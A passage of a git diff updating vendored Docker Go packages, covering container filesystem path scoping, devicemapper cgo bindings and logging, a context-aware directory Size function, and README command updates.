+ ResolveScopedPath(path string, rawPath bool) (string, error) + + Driver +} + +// Driver combines both continuity's Driver and PathDriver interfaces with a Platform +// field to determine the OS. +type Driver interface { + // OS returns the OS where the rootfs is located. Essentially, + // runtime.GOOS for everything aside from LCOW, which is "linux" + OS() string + + // Architecture returns the hardware architecture where the + // container is located. + Architecture() string + + // Driver & PathDriver provide methods to manipulate files & paths + driver.Driver + pathdriver.PathDriver +} + +// NewLocalContainerFS is a helper function to implement daemon's Mount interface +// when the graphdriver mount point is a local path on the machine. +func NewLocalContainerFS(path string) ContainerFS { + return &local{ + path: path, + Driver: driver.LocalDriver, + PathDriver: pathdriver.LocalPathDriver, + } +} + +// NewLocalDriver provides file and path drivers for a local file system. They are +// essentially a wrapper around the `os` and `filepath` functions. 
+func NewLocalDriver() Driver { + return &local{ + Driver: driver.LocalDriver, + PathDriver: pathdriver.LocalPathDriver, + } +} + +type local struct { + path string + driver.Driver + pathdriver.PathDriver +} + +func (l *local) Path() string { + return l.path +} + +func (l *local) ResolveScopedPath(path string, rawPath bool) (string, error) { + cleanedPath := path + if !rawPath { + cleanedPath = cleanScopedPath(path) + } + return symlink.FollowSymlinkInScope(filepath.Join(l.path, cleanedPath), l.path) +} + +func (l *local) OS() string { + return runtime.GOOS +} + +func (l *local) Architecture() string { + return runtime.GOARCH +} diff --git a/vendor/github.com/docker/docker/pkg/containerfs/containerfs_unix.go b/vendor/github.com/docker/docker/pkg/containerfs/containerfs_unix.go new file mode 100644 index 0000000000..6a99459517 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/containerfs/containerfs_unix.go @@ -0,0 +1,10 @@ +// +build !windows + +package containerfs // import "github.com/docker/docker/pkg/containerfs" + +import "path/filepath" + +// cleanScopedPath preappends a to combine with a mnt path. 
+func cleanScopedPath(path string) string { + return filepath.Join(string(filepath.Separator), path) +} diff --git a/vendor/github.com/docker/docker/pkg/containerfs/containerfs_windows.go b/vendor/github.com/docker/docker/pkg/containerfs/containerfs_windows.go new file mode 100644 index 0000000000..9fb7084628 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/containerfs/containerfs_windows.go @@ -0,0 +1,15 @@ +package containerfs // import "github.com/docker/docker/pkg/containerfs" + +import "path/filepath" + +// cleanScopedPath removes the C:\ syntax, and prepares to combine +// with a volume path +func cleanScopedPath(path string) string { + if len(path) >= 2 { + c := path[0] + if path[1] == ':' && ('a' <= c && c <= 'z' || 'A' <= c && c <= 'Z') { + path = path[2:] + } + } + return filepath.Join(string(filepath.Separator), path) +} diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper.go index 94b55306f1..63243637a7 100644 --- a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper.go +++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper.go @@ -1,23 +1,20 @@ -// +build linux +// +build linux,cgo -package devicemapper +package devicemapper // import "github.com/docker/docker/pkg/devicemapper" import ( "errors" "fmt" "os" "runtime" - "syscall" "unsafe" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) -// DevmapperLogger defines methods for logging with devicemapper. 
-type DevmapperLogger interface { - DMLog(level int, file string, line int, dmError int, message string) -} - +// Same as DM_DEVICE_* enum values from libdevmapper.h +// nolint: deadcode const ( deviceCreate TaskType = iota deviceReload @@ -70,12 +67,14 @@ var ( ErrBusy = errors.New("Device is Busy") ErrDeviceIDExists = errors.New("Device Id Exists") ErrEnxio = errors.New("No such device or address") + ErrEnoData = errors.New("No data available") ) var ( - dmSawBusy bool - dmSawExist bool - dmSawEnxio bool // No Such Device or Address + dmSawBusy bool + dmSawExist bool + dmSawEnxio bool // No Such Device or Address + dmSawEnoData bool // No data available ) type ( @@ -155,6 +154,7 @@ func (t *Task) run() error { if res := DmTaskRun(t.unmanaged); res != 1 { return ErrTaskRun } + runtime.KeepAlive(t) return nil } @@ -257,25 +257,12 @@ func (t *Task) getNextTarget(next unsafe.Pointer) (nextPtr unsafe.Pointer, start // UdevWait waits for any processes that are waiting for udev to complete the specified cookie. func UdevWait(cookie *uint) error { if res := DmUdevWait(*cookie); res != 1 { - logrus.Debugf("devicemapper: Failed to wait on udev cookie %d", *cookie) + logrus.Debugf("devicemapper: Failed to wait on udev cookie %d, %d", *cookie, res) return ErrUdevWait } return nil } -// LogInitVerbose is an interface to initialize the verbose logger for the device mapper library. -func LogInitVerbose(level int) { - DmLogInitVerbose(level) -} - -var dmLogger DevmapperLogger - -// LogInit initializes the logger for the device mapper library. -func LogInit(logger DevmapperLogger) { - dmLogger = logger - LogWithErrnoInit() -} - // SetDevDir sets the dev folder for the device mapper library (usually /dev). 
func SetDevDir(dir string) error { if res := DmSetDevDir(dir); res != 1 { @@ -328,17 +315,21 @@ func RemoveDevice(name string) error { return err } - var cookie uint - if err := task.setCookie(&cookie, 0); err != nil { + cookie := new(uint) + if err := task.setCookie(cookie, 0); err != nil { return fmt.Errorf("devicemapper: Can not set cookie: %s", err) } - defer UdevWait(&cookie) + defer UdevWait(cookie) dmSawBusy = false // reset before the task is run + dmSawEnxio = false if err = task.run(); err != nil { if dmSawBusy { return ErrBusy } + if dmSawEnxio { + return ErrEnxio + } return fmt.Errorf("devicemapper: Error running RemoveDevice %s", err) } @@ -361,10 +352,9 @@ func RemoveDeviceDeferred(name string) error { // set a task cookie and disable library fallback, or else libdevmapper will // disable udev dm rules and delete the symlink under /dev/mapper by itself, // even if the removal is deferred by the kernel. - var cookie uint - var flags uint16 - flags = DmUdevDisableLibraryFallback - if err := task.setCookie(&cookie, flags); err != nil { + cookie := new(uint) + flags := uint16(DmUdevDisableLibraryFallback) + if err := task.setCookie(cookie, flags); err != nil { return fmt.Errorf("devicemapper: Can not set cookie: %s", err) } @@ -372,14 +362,18 @@ func RemoveDeviceDeferred(name string) error { // semaphores created in `task.setCookie` will be cleaned up in `UdevWait`. // So these two function call must come in pairs, otherwise semaphores will // be leaked, and the limit of number of semaphores defined in `/proc/sys/kernel/sem` - // will be reached, which will eventually make all follwing calls to 'task.SetCookie' + // will be reached, which will eventually make all following calls to 'task.SetCookie' // fail. // this call will not wait for the deferred removal's final executing, since no // udev event will be generated, and the semaphore's value will not be incremented // by udev, what UdevWait is just cleaning up the semaphore. 
- defer UdevWait(&cookie) + defer UdevWait(cookie) + dmSawEnxio = false if err = task.run(); err != nil { + if dmSawEnxio { + return ErrEnxio + } return fmt.Errorf("devicemapper: Error running RemoveDeviceDeferred %s", err) } @@ -448,7 +442,7 @@ func BlockDeviceDiscard(path string) error { // Without this sometimes the remove of the device that happens after // discard fails with EBUSY. - syscall.Sync() + unix.Sync() return nil } @@ -471,13 +465,12 @@ func CreatePool(poolName string, dataFile, metadataFile *os.File, poolBlockSize return fmt.Errorf("devicemapper: Can't add target %s", err) } - var cookie uint - var flags uint16 - flags = DmUdevDisableSubsystemRulesFlag | DmUdevDisableDiskRulesFlag | DmUdevDisableOtherRulesFlag - if err := task.setCookie(&cookie, flags); err != nil { + cookie := new(uint) + flags := uint16(DmUdevDisableSubsystemRulesFlag | DmUdevDisableDiskRulesFlag | DmUdevDisableOtherRulesFlag) + if err := task.setCookie(cookie, flags); err != nil { return fmt.Errorf("devicemapper: Can't set cookie %s", err) } - defer UdevWait(&cookie) + defer UdevWait(cookie) if err := task.run(); err != nil { return fmt.Errorf("devicemapper: Error running deviceCreate (CreatePool) %s", err) @@ -505,7 +498,7 @@ func ReloadPool(poolName string, dataFile, metadataFile *os.File, poolBlockSize } if err := task.run(); err != nil { - return fmt.Errorf("devicemapper: Error running deviceCreate %s", err) + return fmt.Errorf("devicemapper: Error running ReloadPool %s", err) } return nil @@ -659,11 +652,11 @@ func ResumeDevice(name string) error { return err } - var cookie uint - if err := task.setCookie(&cookie, 0); err != nil { + cookie := new(uint) + if err := task.setCookie(cookie, 0); err != nil { return fmt.Errorf("devicemapper: Can't set cookie %s", err) } - defer UdevWait(&cookie) + defer UdevWait(cookie) if err := task.run(); err != nil { return fmt.Errorf("devicemapper: Error running deviceResume %s", err) @@ -717,10 +710,15 @@ func DeleteDevice(poolName string, 
deviceID int) error { } dmSawBusy = false + dmSawEnoData = false if err := task.run(); err != nil { if dmSawBusy { return ErrBusy } + if dmSawEnoData { + logrus.Debugf("devicemapper: Device(id: %d) from pool(%s) does not exist", deviceID, poolName) + return nil + } return fmt.Errorf("devicemapper: Error running DeleteDevice %s", err) } return nil @@ -757,12 +755,12 @@ func activateDevice(poolName string, name string, deviceID int, size uint64, ext return fmt.Errorf("devicemapper: Can't add node %s", err) } - var cookie uint - if err := task.setCookie(&cookie, 0); err != nil { + cookie := new(uint) + if err := task.setCookie(cookie, 0); err != nil { return fmt.Errorf("devicemapper: Can't set cookie %s", err) } - defer UdevWait(&cookie) + defer UdevWait(cookie) if err := task.run(); err != nil { return fmt.Errorf("devicemapper: Error running deviceCreate (ActivateDevice) %s", err) @@ -792,7 +790,7 @@ func CreateSnapDeviceRaw(poolName string, deviceID int, baseDeviceID int) error if dmSawExist { return ErrDeviceIDExists } - return fmt.Errorf("devicemapper: Error running deviceCreate (createSnapDevice) %s", err) + return fmt.Errorf("devicemapper: Error running deviceCreate (CreateSnapDeviceRaw) %s", err) } return nil diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_log.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_log.go index 8477e36fec..5a5773d44f 100644 --- a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_log.go +++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_log.go @@ -1,21 +1,49 @@ -// +build linux +// +build linux,cgo -package devicemapper +package devicemapper // import "github.com/docker/docker/pkg/devicemapper" import "C" import ( + "fmt" "strings" + + "github.com/sirupsen/logrus" ) +// DevmapperLogger defines methods required to register as a callback for +// logging events received from devicemapper. 
Note that devicemapper will send +// *all* logs regardless to callbacks (including debug logs) so it's +// recommended to not spam the console with the outputs. +type DevmapperLogger interface { + // DMLog is the logging callback containing all of the information from + // devicemapper. The interface is identical to the C libdm counterpart. + DMLog(level int, file string, line int, dmError int, message string) +} + +// dmLogger is the current logger in use that is being forwarded our messages. +var dmLogger DevmapperLogger + +// LogInit changes the logging callback called after processing libdm logs for +// error message information. The default logger simply forwards all logs to +// logrus. Calling LogInit(nil) disables the calling of callbacks. +func LogInit(logger DevmapperLogger) { + dmLogger = logger +} + // Due to the way cgo works this has to be in a separate file, as devmapper.go has // definitions in the cgo block, which is incompatible with using "//export" -// DevmapperLogCallback exports the devmapper log callback for cgo. +// DevmapperLogCallback exports the devmapper log callback for cgo. Note that +// because we are using callbacks, this function will be called for *every* log +// in libdm (even debug ones because there's no way of setting the verbosity +// level for an external logging callback). //export DevmapperLogCallback -func DevmapperLogCallback(level C.int, file *C.char, line C.int, dmErrnoOrClass C.int, message *C.char) { +func DevmapperLogCallback(level C.int, file *C.char, line, dmErrnoOrClass C.int, message *C.char) { msg := C.GoString(message) - if level < 7 { + + // Track what errno libdm saw, because the library only gives us 0 or 1. 
+ if level < LogLevelDebug { if strings.Contains(msg, "busy") { dmSawBusy = true } @@ -27,9 +55,70 @@ func DevmapperLogCallback(level C.int, file *C.char, line C.int, dmErrnoOrClass if strings.Contains(msg, "No such device or address") { dmSawEnxio = true } + if strings.Contains(msg, "No data available") { + dmSawEnoData = true + } } if dmLogger != nil { dmLogger.DMLog(int(level), C.GoString(file), int(line), int(dmErrnoOrClass), msg) } } + +// DefaultLogger is the default logger used by pkg/devicemapper. It forwards +// all logs that are of higher or equal priority to the given level to the +// corresponding logrus level. +type DefaultLogger struct { + // Level corresponds to the highest libdm level that will be forwarded to + // logrus. In order to change this, register a new DefaultLogger. + Level int +} + +// DMLog is the logging callback containing all of the information from +// devicemapper. The interface is identical to the C libdm counterpart. +func (l DefaultLogger) DMLog(level int, file string, line, dmError int, message string) { + if level <= l.Level { + // Forward the log to the correct logrus level, if allowed by dmLogLevel. + logMsg := fmt.Sprintf("libdevmapper(%d): %s:%d (%d) %s", level, file, line, dmError, message) + switch level { + case LogLevelFatal, LogLevelErr: + logrus.Error(logMsg) + case LogLevelWarn: + logrus.Warn(logMsg) + case LogLevelNotice, LogLevelInfo: + logrus.Info(logMsg) + case LogLevelDebug: + logrus.Debug(logMsg) + default: + // Don't drop any "unknown" levels. + logrus.Info(logMsg) + } + } +} + +// registerLogCallback registers our own logging callback function for libdm +// (which is DevmapperLogCallback). +// +// Because libdm only gives us {0,1} error codes we need to parse the logs +// produced by libdm (to set dmSawBusy and so on). Note that by registering a +// callback using DevmapperLogCallback, libdm will no longer output logs to +// stderr so we have to log everything ourselves. 
None of this handling is +// optional because we depend on log callbacks to parse the logs, and if we +// don't forward the log information we'll be in a lot of trouble when +// debugging things. +func registerLogCallback() { + LogWithErrnoInit() +} + +func init() { + // Use the default logger by default. We only allow LogLevelFatal by + // default, because internally we mask a lot of libdm errors by retrying + // and similar tricks. Also, libdm is very chatty and we don't want to + // worry users for no reason. + dmLogger = DefaultLogger{ + Level: LogLevelFatal, + } + + // Register as early as possible so we don't miss anything. + registerLogCallback() +} diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper.go index 91fbc85b3a..0b88f49695 100644 --- a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper.go +++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper.go @@ -1,9 +1,9 @@ -// +build linux +// +build linux,cgo -package devicemapper +package devicemapper // import "github.com/docker/docker/pkg/devicemapper" /* -#cgo LDFLAGS: -L. -ldevmapper +#define _GNU_SOURCE #include #include // FIXME: present only for BLKGETSIZE64, maybe we can remove it? @@ -12,19 +12,25 @@ extern void DevmapperLogCallback(int level, char *file, int line, int dm_errno_o static void log_cb(int level, const char *file, int line, int dm_errno_or_class, const char *f, ...) { - char buffer[256]; - va_list ap; - - va_start(ap, f); - vsnprintf(buffer, 256, f, ap); - va_end(ap); + char *buffer = NULL; + va_list ap; + int ret; + + va_start(ap, f); + ret = vasprintf(&buffer, f, ap); + va_end(ap); + if (ret < 0) { + // memory allocation failed -- should never happen? 
+ return; + } - DevmapperLogCallback(level, (char *)file, line, dm_errno_or_class, buffer); + DevmapperLogCallback(level, (char *)file, line, dm_errno_or_class, buffer); + free(buffer); } static void log_with_errno_init() { - dm_log_with_errno_init(log_cb); + dm_log_with_errno_init(log_cb); } */ import "C" @@ -56,7 +62,6 @@ const ( var ( DmGetLibraryVersion = dmGetLibraryVersionFct DmGetNextTarget = dmGetNextTargetFct - DmLogInitVerbose = dmLogInitVerboseFct DmSetDevDir = dmSetDevDirFct DmTaskAddTarget = dmTaskAddTargetFct DmTaskCreate = dmTaskCreateFct @@ -211,7 +216,7 @@ func dmGetNextTargetFct(task *cdmTask, next unsafe.Pointer, start, length *uint6 } func dmUdevSetSyncSupportFct(syncWithUdev int) { - (C.dm_udev_set_sync_support(C.int(syncWithUdev))) + C.dm_udev_set_sync_support(C.int(syncWithUdev)) } func dmUdevGetSyncSupportFct() int { @@ -226,10 +231,6 @@ func dmCookieSupportedFct() int { return int(C.dm_cookie_supported()) } -func dmLogInitVerboseFct(level int) { - C.dm_log_init_verbose(C.int(level)) -} - func logWithErrnoInitFct() { C.log_with_errno_init() } diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic.go new file mode 100644 index 0000000000..8a1098f7d5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic.go @@ -0,0 +1,6 @@ +// +build linux,cgo,!static_build + +package devicemapper // import "github.com/docker/docker/pkg/devicemapper" + +// #cgo pkg-config: devmapper +import "C" diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_deferred_remove.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic_deferred_remove.go similarity index 75% rename from vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_deferred_remove.go rename to vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic_deferred_remove.go index 
dc361eab76..3d3021c4e1 100644 --- a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_deferred_remove.go +++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic_deferred_remove.go @@ -1,14 +1,15 @@ -// +build linux,!libdm_no_deferred_remove +// +build linux,cgo,!static_build +// +build !libdm_dlsym_deferred_remove,!libdm_no_deferred_remove -package devicemapper +package devicemapper // import "github.com/docker/docker/pkg/devicemapper" /* -#cgo LDFLAGS: -L. -ldevmapper #include */ import "C" -// LibraryDeferredRemovalSupport is supported when statically linked. +// LibraryDeferredRemovalSupport tells if the feature is supported by the +// current Docker invocation. const LibraryDeferredRemovalSupport = true func dmTaskDeferredRemoveFct(task *cdmTask) int { diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic_dlsym_deferred_remove.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic_dlsym_deferred_remove.go new file mode 100644 index 0000000000..5dfb369f1f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic_dlsym_deferred_remove.go @@ -0,0 +1,128 @@ +// +build linux,cgo,!static_build +// +build libdm_dlsym_deferred_remove,!libdm_no_deferred_remove + +package devicemapper + +/* +#cgo LDFLAGS: -ldl +#include +#include +#include + +// Yes, I know this looks scary. In order to be able to fill our own internal +// dm_info with deferred_remove we need to have a struct definition that is +// correct (regardless of the version of libdm that was used to compile it). To +// this end, we define struct_backport_dm_info. This code comes from lvm2, and +// I have verified that the structure has only ever had elements *appended* to +// it (since 2001). +// +// It is also important that this structure be _larger_ than the dm_info that +// libdevmapper expected. 
Otherwise libdm might try to write to memory it +// shouldn't (they don't have a "known size" API). +struct backport_dm_info { + int exists; + int suspended; + int live_table; + int inactive_table; + int32_t open_count; + uint32_t event_nr; + uint32_t major; + uint32_t minor; + int read_only; + + int32_t target_count; + + int deferred_remove; + int internal_suspend; + + // Padding, purely for our own safety. This is to avoid cases where libdm + // was updated underneath us and we call into dm_task_get_info() with too + // small of a buffer. + char _[512]; +}; + +// We have to wrap this in CGo, because Go really doesn't like function pointers. +int call_dm_task_deferred_remove(void *fn, struct dm_task *task) +{ + int (*_dm_task_deferred_remove)(struct dm_task *task) = fn; + return _dm_task_deferred_remove(task); +} +*/ +import "C" + +import ( + "unsafe" + + "github.com/sirupsen/logrus" +) + +// dm_task_deferred_remove is not supported by all distributions, due to +// out-dated versions of devicemapper. However, in the case where the +// devicemapper library was updated without rebuilding Docker (which can happen +// in some distributions) then we should attempt to dynamically load the +// relevant object rather than try to link to it. + +// dmTaskDeferredRemoveFct is a "bound" version of dm_task_deferred_remove. +// It is nil if dm_task_deferred_remove was not found in the libdevmapper that +// is currently loaded. +var dmTaskDeferredRemovePtr unsafe.Pointer + +// LibraryDeferredRemovalSupport tells if the feature is supported by the +// current Docker invocation. This value is fixed during init. +var LibraryDeferredRemovalSupport bool + +func init() { + // Clear any errors. + var err *C.char + C.dlerror() + + // The symbol we want to fetch. + symName := C.CString("dm_task_deferred_remove") + defer C.free(unsafe.Pointer(symName)) + + // See if we can find dm_task_deferred_remove. 
Since we already are linked + // to libdevmapper, we can search our own address space (rather than trying + // to guess what libdevmapper is called). We use NULL here, as RTLD_DEFAULT + // is not available in CGO (even if you set _GNU_SOURCE for some reason). + // The semantics are identical on glibc. + sym := C.dlsym(nil, symName) + err = C.dlerror() + if err != nil { + logrus.Debugf("devmapper: could not load dm_task_deferred_remove: %s", C.GoString(err)) + return + } + + logrus.Debugf("devmapper: found dm_task_deferred_remove at %x", uintptr(sym)) + dmTaskDeferredRemovePtr = sym + LibraryDeferredRemovalSupport = true +} + +func dmTaskDeferredRemoveFct(task *cdmTask) int { + sym := dmTaskDeferredRemovePtr + if sym == nil || !LibraryDeferredRemovalSupport { + return -1 + } + return int(C.call_dm_task_deferred_remove(sym, (*C.struct_dm_task)(task))) +} + +func dmTaskGetInfoWithDeferredFct(task *cdmTask, info *Info) int { + if !LibraryDeferredRemovalSupport { + return -1 + } + + Cinfo := C.struct_backport_dm_info{} + defer func() { + info.Exists = int(Cinfo.exists) + info.Suspended = int(Cinfo.suspended) + info.LiveTable = int(Cinfo.live_table) + info.InactiveTable = int(Cinfo.inactive_table) + info.OpenCount = int32(Cinfo.open_count) + info.EventNr = uint32(Cinfo.event_nr) + info.Major = uint32(Cinfo.major) + info.Minor = uint32(Cinfo.minor) + info.ReadOnly = int(Cinfo.read_only) + info.TargetCount = int32(Cinfo.target_count) + info.DeferredRemove = int(Cinfo.deferred_remove) + }() + return int(C.dm_task_get_info((*C.struct_dm_task)(task), (*C.struct_dm_info)(unsafe.Pointer(&Cinfo)))) +} diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_no_deferred_remove.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_no_deferred_remove.go index 8249ccf854..8889f0f46f 100644 --- a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_no_deferred_remove.go +++ 
b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_no_deferred_remove.go @@ -1,8 +1,10 @@ -// +build linux,libdm_no_deferred_remove +// +build linux,cgo +// +build !libdm_dlsym_deferred_remove,libdm_no_deferred_remove -package devicemapper +package devicemapper // import "github.com/docker/docker/pkg/devicemapper" -// LibraryDeferredRemovalSupport is not supported when statically linked. +// LibraryDeferredRemovalSupport tells if the feature is supported by the +// current Docker invocation. const LibraryDeferredRemovalSupport = false func dmTaskDeferredRemoveFct(task *cdmTask) int { diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/ioctl.go b/vendor/github.com/docker/docker/pkg/devicemapper/ioctl.go index 581b57eb86..ec5a0b33ba 100644 --- a/vendor/github.com/docker/docker/pkg/devicemapper/ioctl.go +++ b/vendor/github.com/docker/docker/pkg/devicemapper/ioctl.go @@ -1,15 +1,16 @@ -// +build linux +// +build linux,cgo -package devicemapper +package devicemapper // import "github.com/docker/docker/pkg/devicemapper" import ( - "syscall" "unsafe" + + "golang.org/x/sys/unix" ) func ioctlBlkGetSize64(fd uintptr) (int64, error) { var size int64 - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, BlkGetSize64, uintptr(unsafe.Pointer(&size))); err != 0 { + if _, _, err := unix.Syscall(unix.SYS_IOCTL, fd, BlkGetSize64, uintptr(unsafe.Pointer(&size))); err != 0 { return 0, err } return size, nil @@ -20,7 +21,7 @@ func ioctlBlkDiscard(fd uintptr, offset, length uint64) error { r[0] = offset r[1] = length - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, BlkDiscard, uintptr(unsafe.Pointer(&r[0]))); err != 0 { + if _, _, err := unix.Syscall(unix.SYS_IOCTL, fd, BlkDiscard, uintptr(unsafe.Pointer(&r[0]))); err != 0 { return err } return nil diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/log.go b/vendor/github.com/docker/docker/pkg/devicemapper/log.go index cee5e54549..dd330ba4f8 100644 --- 
a/vendor/github.com/docker/docker/pkg/devicemapper/log.go +++ b/vendor/github.com/docker/docker/pkg/devicemapper/log.go @@ -1,4 +1,4 @@ -package devicemapper +package devicemapper // import "github.com/docker/docker/pkg/devicemapper" // definitions from lvm2 lib/log/log.h const ( diff --git a/vendor/github.com/docker/docker/pkg/directory/directory.go b/vendor/github.com/docker/docker/pkg/directory/directory.go index 1715ef45d9..51d4a6ea22 100644 --- a/vendor/github.com/docker/docker/pkg/directory/directory.go +++ b/vendor/github.com/docker/docker/pkg/directory/directory.go @@ -1,4 +1,4 @@ -package directory +package directory // import "github.com/docker/docker/pkg/directory" import ( "io/ioutil" diff --git a/vendor/github.com/docker/docker/pkg/directory/directory_test.go b/vendor/github.com/docker/docker/pkg/directory/directory_test.go index 2b7a4657be..ea62bdf236 100644 --- a/vendor/github.com/docker/docker/pkg/directory/directory_test.go +++ b/vendor/github.com/docker/docker/pkg/directory/directory_test.go @@ -1,6 +1,7 @@ -package directory +package directory // import "github.com/docker/docker/pkg/directory" import ( + "context" "io/ioutil" "os" "path/filepath" @@ -18,7 +19,7 @@ func TestSizeEmpty(t *testing.T) { } var size int64 - if size, _ = Size(dir); size != 0 { + if size, _ = Size(context.Background(), dir); size != 0 { t.Fatalf("empty directory has size: %d", size) } } @@ -37,7 +38,7 @@ func TestSizeEmptyFile(t *testing.T) { } var size int64 - if size, _ = Size(file.Name()); size != 0 { + if size, _ = Size(context.Background(), file.Name()); size != 0 { t.Fatalf("directory with one file has size: %d", size) } } @@ -59,7 +60,7 @@ func TestSizeNonemptyFile(t *testing.T) { file.Write(d) var size int64 - if size, _ = Size(file.Name()); size != 5 { + if size, _ = Size(context.Background(), file.Name()); size != 5 { t.Fatalf("directory with one 5-byte file has size: %d", size) } } @@ -76,7 +77,7 @@ func TestSizeNestedDirectoryEmpty(t *testing.T) { } var size 
int64 - if size, _ = Size(dir); size != 0 { + if size, _ = Size(context.Background(), dir); size != 0 { t.Fatalf("directory with one empty directory has size: %d", size) } } @@ -101,7 +102,7 @@ func TestSizeFileAndNestedDirectoryEmpty(t *testing.T) { file.Write(d) var size int64 - if size, _ = Size(dir); size != 6 { + if size, _ = Size(context.Background(), dir); size != 6 { t.Fatalf("directory with 6-byte file and empty directory has size: %d", size) } } @@ -134,7 +135,7 @@ func TestSizeFileAndNestedDirectoryNonempty(t *testing.T) { nestedFile.Write(nestedData) var size int64 - if size, _ = Size(dir); size != 12 { + if size, _ = Size(context.Background(), dir); size != 12 { t.Fatalf("directory with 6-byte file and nested directory with 6-byte file has size: %d", size) } } @@ -186,7 +187,7 @@ func TestMoveToSubdir(t *testing.T) { // Test a non-existing directory func TestSizeNonExistingDirectory(t *testing.T) { - if _, err := Size("/thisdirectoryshouldnotexist/TestSizeNonExistingDirectory"); err == nil { + if _, err := Size(context.Background(), "/thisdirectoryshouldnotexist/TestSizeNonExistingDirectory"); err == nil { t.Fatalf("error is expected") } } diff --git a/vendor/github.com/docker/docker/pkg/directory/directory_unix.go b/vendor/github.com/docker/docker/pkg/directory/directory_unix.go index 397251bdb8..f56dd7a8f9 100644 --- a/vendor/github.com/docker/docker/pkg/directory/directory_unix.go +++ b/vendor/github.com/docker/docker/pkg/directory/directory_unix.go @@ -1,15 +1,16 @@ -// +build linux freebsd solaris +// +build linux freebsd darwin -package directory +package directory // import "github.com/docker/docker/pkg/directory" import ( + "context" "os" "path/filepath" "syscall" ) // Size walks a directory tree and returns its total size in bytes. 
-func Size(dir string) (size int64, err error) { +func Size(ctx context.Context, dir string) (size int64, err error) { data := make(map[uint64]struct{}) err = filepath.Walk(dir, func(d string, fileInfo os.FileInfo, err error) error { if err != nil { @@ -20,6 +21,11 @@ func Size(dir string) (size int64, err error) { } return err } + select { + case <-ctx.Done(): + return ctx.Err() + default: + } // Ignore directory sizes if fileInfo == nil { @@ -34,11 +40,11 @@ func Size(dir string) (size int64, err error) { // Check inode to handle hard links correctly inode := fileInfo.Sys().(*syscall.Stat_t).Ino // inode is not a uint64 on all platforms. Cast it to avoid issues. - if _, exists := data[uint64(inode)]; exists { + if _, exists := data[inode]; exists { return nil } // inode is not a uint64 on all platforms. Cast it to avoid issues. - data[uint64(inode)] = struct{}{} + data[inode] = struct{}{} size += s diff --git a/vendor/github.com/docker/docker/pkg/directory/directory_windows.go b/vendor/github.com/docker/docker/pkg/directory/directory_windows.go index 6fb0917c4c..f07f241880 100644 --- a/vendor/github.com/docker/docker/pkg/directory/directory_windows.go +++ b/vendor/github.com/docker/docker/pkg/directory/directory_windows.go @@ -1,14 +1,13 @@ -// +build windows - -package directory +package directory // import "github.com/docker/docker/pkg/directory" import ( + "context" "os" "path/filepath" ) // Size walks a directory tree and returns its total size in bytes. -func Size(dir string) (size int64, err error) { +func Size(ctx context.Context, dir string) (size int64, err error) { err = filepath.Walk(dir, func(d string, fileInfo os.FileInfo, err error) error { if err != nil { // if dir does not exist, Size() returns the error. 
@@ -19,6 +18,12 @@ func Size(dir string) (size int64, err error) { return err } + select { + case <-ctx.Done(): + return ctx.Err() + default: + } + // Ignore directory sizes if fileInfo == nil { return nil diff --git a/vendor/github.com/docker/docker/pkg/discovery/README.md b/vendor/github.com/docker/docker/pkg/discovery/README.md index 39777c2171..d8ed9ce71e 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/README.md +++ b/vendor/github.com/docker/docker/pkg/discovery/README.md @@ -17,7 +17,7 @@ the address Docker uses to advertise the node using the `--cluster-advertise` flag. ```bash -$ docker daemon -H= --cluster-advertise= --cluster-store etcd://,/ +$ dockerd -H= --cluster-advertise= --cluster-store etcd://,/ ``` ### Using consul @@ -27,7 +27,7 @@ the address Docker uses to advertise the node using the `--cluster-advertise` flag. ```bash -$ docker daemon -H= --cluster-advertise= --cluster-store consul:/// +$ dockerd -H= --cluster-advertise= --cluster-store consul:/// ``` ### Using zookeeper @@ -37,5 +37,5 @@ the address Docker uses to advertise the node using the `--cluster-advertise` flag. 
